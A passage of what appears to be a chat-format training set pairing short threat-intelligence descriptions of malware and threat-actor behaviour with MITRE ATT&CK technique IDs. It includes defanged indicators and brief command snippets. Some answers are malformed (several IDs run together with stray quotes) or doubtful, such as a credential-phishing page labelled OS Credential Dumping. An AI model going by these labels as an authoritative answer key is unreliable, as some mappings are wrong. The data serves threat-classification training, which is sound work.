[ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors used `ipconfig`, `nbtstat`, `tracert`, `route print`, and `cat /etc/hosts` commands." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CORESHELL is installed via execution of rundll32 with an export named \"init\" or \"InitW.\"" }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The loader’s main goal was to run a PowerShell command to execute shellcode" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Psylo has commands to enumerate all storage devices and to find all files that start with a particular string." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowGoop can use a modified Base64 encoding mechanism to send data to and from the C2 server." }, { "role": "assistant", "content": "T1132.002 - Non-Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trojan.Karagany can capture keystrokes on a compromised host." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obfuscated scripts that were used on victim machines." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TAINTEDSCRIBE can delete files from a compromised host." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SeaDuke has been packed with the UPX packer." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kessel can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS." }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti for Windows sets its DLL file as a new service in the Registry to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShellTea utilizes a number of techniques to identify if it is running within a virtual environment or is being monitored." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks', 'T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Honeybee, the threat actors used a legitimate Windows executable and secure directory for their payloads to bypass UAC." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download files from remote servers." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has used legitimate local admin account credentials." }, { "role": "assistant", "content": "T1078.003 - Valid Accounts: Local Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldMax has decoded and decrypted the configuration file when executed." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FoggyWeb can be disguised as a Visual Studio file such as `Windows.Data.TimeZones.zh-PH.pri` to evade detection. Also, FoggyWeb's loader can mimic a genuine `dll` file that carries out the same import functions as the legitimate Windows `version.dll` file." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can capture the victim's screen." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT18 establishes persistence via the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Night Dragon used privately developed and customized remote access tools." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used an HTTP malware variant and a Port 22 malware variant to collect the victim’s username." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BitPaymer can use \"net view\" to discover remote systems." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Along with the change to using a DLL, Qbot also changed where it stores configuration information on the infected host. Earlier versions of Qbot stored this data within a DAT file in the same randomly named folder as the malicious binary. As of late 2020, this data is now stored in the registry, under a randomly named subkey under HKCU\\Software\\Microsoft. While this move to the registry keeps things a bit more hidden from prying eyes, in both cases the presence of a randomly named value under the Microsoft folder/key should be cause to investigate" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has use `mshta` to execute malicious scripts on a compromised host." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "browser history from Firefox, Google Chrome, Microsoft Edge and Internet Explorer; - usernames and passwords stored in the listed browsers; - email accounts from Microsoft Outlook and Mozilla Thunderbird" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1087.003 - Email Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server." }, { "role": "assistant", "content": "T1114.001 - Email Collection: Local Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BISCUIT has a command to launch a command shell on the system." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 contains modules that allow for use of proxies in command and control." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has hosted custom and open-source tools on compromised as well as Lazarus Group-controlled servers." }, { "role": "assistant", "content": "T1608.002 - Upload Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In March 2016, a financially motivated threat actor launched several tailored spear phishing campaigns primarily targeting the retail, restaurant, and hospitality industries. The emails contained variations of Microsoft Word documents with embedded macros that, when enabled, downloaded and executed a malicious downloader that we refer to as PUNCHBUGGY" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An attacker sends an e-mail with a malicious Tar archive attached." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. R88.sh\" is a shell script that installs a cron job and attempts to download \"lowerv2.sh\" or \"rootv2.sh. Based on the config file it uses, it appears to be the Monero Silent Miner. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure" }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has disguised services to appear as benign software or related to operating system functions." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can register itself as a system service to gain persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Backdoor.Oldrea collects the current username from the victim." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LockerGoga has been observed shutting down infected systems." }, { "role": "assistant", "content": "T1529 - System Shutdown/Reboot" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRatReporter used LZ compression to compress initial reconnaissance reports before sending to the C2." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Raspberry Robin leverages rundll32.exe followed by shell32.dll and calls the ShellExec_RunDLL or ShellExec_RunDLLA functions to execute the DLL via the processes such as odbcconf.exe, msiexec.exe and control.exe." }, { "role": "assistant", "content": "T1218.008 - Signed Binary Proxy Execution: Odbcconf', 'T1218.007 - Signed Binary Proxy Execution: Msiexec', 'T1218.002 - Signed Binary Proxy Execution: Control Panel', 'T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A tool can use WMI to execute a binary." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Caterpillar WebShell has a module to perform brute force attacks on a system." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, the command: system_profiler SPHardwareDataType 2>/dev/null || awk ‘/Boot ROM Version/ {split($0, line, “:”);printf(“%s”, line[2]);} checks if the machine is one of the following: “MBP”, “MBA”, “MB”, “MM”, “IM”, “MP” and “XS”. These codes represent the model of the system. For instance, “MBP” stands for MacBook Pro, “MBA” stands for MacBook Air and so on" }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some strings in are obfuscated with XOR x56." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX can modify the characteristics of folders to hide them from the compromised user." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AgentTesla is a .Net-based infostealer that has the capability to steal data from different applications on victim machines, such as browsers, FTP clients, and file downloaders. One of the new modules that has been added to this malware is the capability to steal WiFi profiles" }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 3 Password handover form displayed after credential theft The infrastructure used in these credential harvesting attacks used the domain 0utl00k[.]net, which at the time of the attacks resolved to 107.175.150[.]113 and 195.154.41[.]150" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remcos can add itself to the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "identifies files matching certain file extension and copies them to subdirectories it created." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One unique and fairly recent variant is a plain downloader that follows a similar convention to the aforementioned MarkiRAT implants. It also leverages MFC and embeds its logic within a CDialog class, getting executed upon initiation of an MFC dialog object during runtime. The use of this sample diverges from those used by the group in the past, where the payload was dropped by the malware itself, suggesting that the group might be in the process of changing some of its TTPs" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee can enumerate the OS version and domain on a targeted system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Deleted File created by vmtoolsd.exe and executed by vmtoolsd.exe child process." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can inject itself into processes including explore.exe, Iexplore.exe, and Mobsync.exe." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Moses Staff has dropped a web shell onto a compromised system." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. While the use of e-mail recipient tracking, a linked RTF document, and a final payload (QuasarRAT variant) remained the same, certain elements differed across campaigns observed. Exploitation and Malware Execution . Upon opening the above attachments, the recipient will be presented with a document that is a direct copy of a blog post or report released by the think tank organization being impersonated. When the malicious RTF document is opened, two things happen that allow the attacker malware to run. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"qrat.exe\" dropper from the current user's %tmp% directory. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The encrypted request includes a PC identifier and timestamp, and optionally some other data. It is worth noting that the RC2FM module uses a number of encryption methods (variations of a simple XOR encryption routine), unlike the other InvisiMole parts" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Honeybee, the threat actors used batch files that reduced their fingerprint on a compromised system by deleting malware-related files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman encodes data using hexadecimal representation before sending it to the C2 server." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IcedID has used HTTPS in communications with C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named “vmtoolsd.” Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name ‘MSASCuiLTasks’ in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence" }, { "role": "assistant", "content": "T1057 - Process Discovery', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can delete files and directories." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "terminates anti-malware processes if they’re found running on the system." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hydraq creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files: MD5 Filename d76261ba3b624933a6ebb5dd73758db4 WmiApCom 79b68cdd0044edd4fbf8067b22878644 WmiApCom.bat The “WmiApCom.bat” file is simply used to start “WmiApCom”, which happens to be the exact same file as the one dropped by the malicious Word documents" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WindTail has the ability to use HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyclops Blink can upload files from a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dok downloads and installs Tor via homebrew." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used COM hijacking for persistence by replacing the legitimate MMDeviceEnumerator object with a payload." }, { "role": "assistant", "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak can determine if a compromised host has security products installed." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TG-3390 uses DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL. The DLL acts as a stub loader, which loads and executes the shell code. The adversaries have used this technique to allow PlugX and HttpBrowser to persist on a system" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The script “enu.cmd” created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German, French, and English" }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall', 'T1098 - Account Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium has used dynamic DNS in its C2 infrastructure." }, { "role": "assistant", "content": "T1568 - Dynamic Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "will timestomp any files or payloads placed on a target machine to help them blend in." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDelete is digitally signed by Microsoft." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke has changed file permissions of files so they could not be modified." }, { "role": "assistant", "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers." }, { "role": "assistant", "content": "T1001 - Data Obfuscation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can add a CLSID key for payload execution through `Registry.CurrentUser.CreateSubKey(\"Software\\\\Classes\\\\CLSID\\\\{\" + clsid + \"}\\\\InProcServer32\")`." }, { "role": "assistant", "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used net time to check the local time on a target system." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: 